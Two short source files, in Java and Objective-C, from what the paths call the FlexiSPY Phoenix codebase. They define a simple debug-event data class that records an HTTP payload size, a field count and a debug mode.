File: 2012-01-11_v.1.03.2/Phoenix/src/com/vvt/prot/event/HttpBatteryLifeDebugEvent.java
package com.vvt.prot.event;

public class HttpBatteryLifeDebugEvent extends BatteryLifeDebugEvent {

	private String payloadSize = null;
	private int fieldCount = 5;
	
	public void setPayloadSize(String payloadSize) {
		this.payloadSize = payloadSize;
	}
	
	public String getPayloadSize() {
		return payloadSize;
	}

	public int getFieldCount() {
		return fieldCount;
	}
	
	public DebugMode getMode() {
		return DebugMode.HTTP;
	}	
}

File: iOS/FlexiSPY Phoenix 4.9.3/codebase/PhoenixEngine/Phoenix/ProtocolBuilder/Classes/Event/System/HTTPBatteryLifeDebugEvent.m
//
//  HTTPBatteryLifeDebugEvent.m
//  ProtocolBuilder
//
//  Created by Pichaya Srifar on 8/29/11.
//  Copyright 2011 Vervata. All rights reserved.
//

#import "HTTPBatteryLifeDebugEvent.h"
#import "DebugModeEnum.h"

@implementation HTTPBatteryLifeDebugEvent

@synthesize payloadSize;

-(DebugMode)getMode {
	return HTTP_BATTERY_LIFE;
}

- (int)getFieldCount {
	return 0;
}

//=========================================================== 
// dealloc
//=========================================================== 
- (void)dealloc
{
    [payloadSize release];
	
    [super dealloc];
}

@end
